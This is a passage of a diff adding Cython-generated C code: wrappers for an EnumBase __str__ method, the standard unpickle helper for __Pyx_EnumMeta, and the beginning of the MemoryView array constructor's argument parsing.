Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_14__Pyx_FlagBase_5__str__ = {"__str__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_14__Pyx_FlagBase_5__str__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_14__Pyx_FlagBase_5__str__(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_self = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__str__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_self,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_self)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 64, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__str__") < 0)) __PYX_ERR(1, 64, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_self = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__str__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 64, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase_14__Pyx_FlagBase_4__str__(__pyx_self, __pyx_v_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__str__", 0); + + /* "EnumBase":65 + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + * return "%s.%s" % (self.__class__.__name__, self.name) # <<<<<<<<<<<<<< + * + * if PY_VERSION_HEX >= 0x03060000: + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_class); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_name_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_self, __pyx_n_s_name); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1); + __pyx_t_2 = 0; + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_s_s, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 65, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("EnumBase.__Pyx_FlagBase.__str__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta = {"__pyx_unpickle___Pyx_EnumMeta", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v___pyx_type = 0; + long __pyx_v___pyx_checksum; + PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__pyx_unpickle___Pyx_EnumMeta (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_type,&__pyx_n_s_pyx_checksum,&__pyx_n_s_pyx_state,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_type)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_checksum)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle___Pyx_EnumMeta", 1, 3, 3, 1); __PYX_ERR(1, 1, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle___Pyx_EnumMeta", 1, 3, 3, 2); __PYX_ERR(1, 1, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__pyx_unpickle___Pyx_EnumMeta") < 0)) __PYX_ERR(1, 1, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v___pyx_type = values[0]; + __pyx_v___pyx_checksum = __Pyx_PyInt_As_long(values[1]); if (unlikely((__pyx_v___pyx_checksum == (long)-1) && PyErr_Occurred())) __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_v___pyx_state = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__pyx_unpickle___Pyx_EnumMeta", 1, 3, 3, __pyx_nargs); __PYX_ERR(1, 1, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("EnumBase.__pyx_unpickle___Pyx_EnumMeta", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_8EnumBase___pyx_unpickle___Pyx_EnumMeta(__pyx_self, __pyx_v___pyx_type, __pyx_v___pyx_checksum, __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_8EnumBase___pyx_unpickle___Pyx_EnumMeta(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_v___pyx_PickleError = 0; + PyObject *__pyx_v___pyx_result = 0; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle___Pyx_EnumMeta", 0); + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + */ + __pyx_t_1 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_t_1, __pyx_tuple__2, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (__pyx_t_2) { + + /* "(tree fragment)":5 + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): + * from pickle import PickleError as __pyx_PickleError # <<<<<<<<<<<<<< + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + */ + __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_s_PickleError); + __Pyx_GIVEREF(__pyx_n_s_PickleError); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_s_PickleError); + __pyx_t_3 = __Pyx_Import(__pyx_n_s_pickle, __pyx_t_1, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_PickleError); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_t_1); + __pyx_v___pyx_PickleError = __pyx_t_1; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":6 + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum # <<<<<<<<<<<<<< + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: + */ + __pyx_t_3 = __Pyx_PyInt_From_long(__pyx_v___pyx_checksum); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_1 = __Pyx_PyString_Format(__pyx_kp_s_Incompatible_checksums_0x_x_vs_0, __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 6, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_v___pyx_PickleError, __pyx_t_1, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(1, 6, __pyx_L1_error) + + /* "(tree fragment)":4 + * cdef object __pyx_PickleError + * cdef object __pyx_result + * if __pyx_checksum not in (0xe3b0c44, 0xda39a3e, 0xd41d8cd): # <<<<<<<<<<<<<< + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + */ + } + + /* "(tree fragment)":7 + * from pickle import PickleError as __pyx_PickleError + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) # <<<<<<<<<<<<<< + * if __pyx_state is not None: + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_n_s_new); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_v___pyx_type}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 7, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_v___pyx_result = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + */ + __pyx_t_2 = (__pyx_v___pyx_state != Py_None); + if (__pyx_t_2) { + + /* "(tree fragment)":9 + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle___Pyx_EnumMeta__set_state(((struct __pyx_obj___Pyx_EnumMeta *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())" % __pyx_checksum + * __pyx_result = __Pyx_EnumMeta.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("EnumBase.__pyx_unpickle___Pyx_EnumMeta", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + +static PyObject *__pyx_unpickle___Pyx_EnumMeta__set_state(struct __pyx_obj___Pyx_EnumMeta *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle___Pyx_EnumMeta__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 12, __pyx_L1_error) + } + __pyx_t_2 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_2 == ((Py_ssize_t)-1))) __PYX_ERR(1, 12, __pyx_L1_error) + __pyx_t_3 = (__pyx_t_2 > 0); + if (__pyx_t_3) { + } else { + __pyx_t_1 = __pyx_t_3; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_3 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(1, 12, __pyx_L1_error) + __pyx_t_1 = __pyx_t_3; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "(tree fragment)":13 + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[0]) # <<<<<<<<<<<<<< + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_update); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 13, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_5}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 13, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle___Pyx_EnumMeta__set_state(<__Pyx_EnumMeta> __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle___Pyx_EnumMeta__set_state(__Pyx_EnumMeta __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * if len(__pyx_state) > 0 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[0]) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("EnumBase.__pyx_unpickle___Pyx_EnumMeta__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + +/* Python wrapper */ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_shape = 0; + Py_ssize_t __pyx_v_itemsize; + PyObject *__pyx_v_format = 0; + PyObject *__pyx_v_mode = 0; + int __pyx_v_allocate_buffer; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_shape,&__pyx_n_s_itemsize,&__pyx_n_s_format,&__pyx_n_s_mode,&__pyx_n_s_allocate_buffer,0}; + PyObject* values[5] = {0,0,0,0,0}; + values[3] = ((PyObject *)__pyx_n_s_c); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_shape)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) 